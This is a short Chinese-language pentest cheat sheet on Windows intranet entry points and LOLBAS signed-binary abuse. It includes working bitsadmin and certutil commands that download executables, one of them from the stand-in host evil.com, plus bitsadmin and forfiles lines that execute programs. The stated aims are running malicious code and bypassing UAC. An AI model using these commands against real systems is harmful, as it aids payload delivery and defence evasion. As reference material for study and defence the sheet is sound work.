常见入口
• SMB 弱密码
• SqlServer 弱密码
LOLBAS,全称 Living Of The Land Binaries and Scripts (and also Libraries),是一种白利用方式,是在 2013 年 DerbyCon 由 Christopher Campbell 和 Matt Graeber 发现,最终 Philip Goh 提出的概念。 这些程序一般有有 Microsoft 或第三方认证机构的签名,但是除了可以完成正常的功能,也能够被用于内网测试中。这些程序可能会被用于:下载安全恶意程序、执行恶意代码、绕过 UAC、绕过程序控制等。
常见程序
• appsyncvpublishing.exe
– 执行 powershell
• bitsadmin.exe
– 下载文件 bitsadmin /transfer <job_name> /priority <priority> <remote_path>
<local_path>
– 下载文件 bitsadmin /create 1 bitsadmin /addfile 1 https://evil.com/autoruns.
exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete
– 复制文件 bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.
exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete
1 & bitsadmin /reset
– 代码执行 bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.
exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1
c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
• cdb.exe
• certutil.exe
– 可安装、备份、删除、管理和执行证书
– 证书存储相关功能
– 下载文件 certutil -urlcache -split -f https://addr/example.exe
– 注意 certutil 是有 cache 的,需要显式删除
– base64 编解码 certutil -encode / certutil -decode
• cmd.exe
• cmstp.exe
• control.exe
– 加载 dll
• csc.exe
– 编译 C# 载荷
• cscript.exe
– 执行脚本
• extexport.exe
• expand.exe
– 展开一个或多个压缩文件
• forfles.exe
– forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
• mofcomp.exe
• makecab.exe
• msbuild.exe
– 构建应用程序
• mshta.exe
– HTML 应用
• msiexec.exe
– 安装 msi
– 加载 dll
• msxsl.exe
– 处理 XSL 程序
• netsh.exe
• installutil.exe
– 安装/卸载程序组件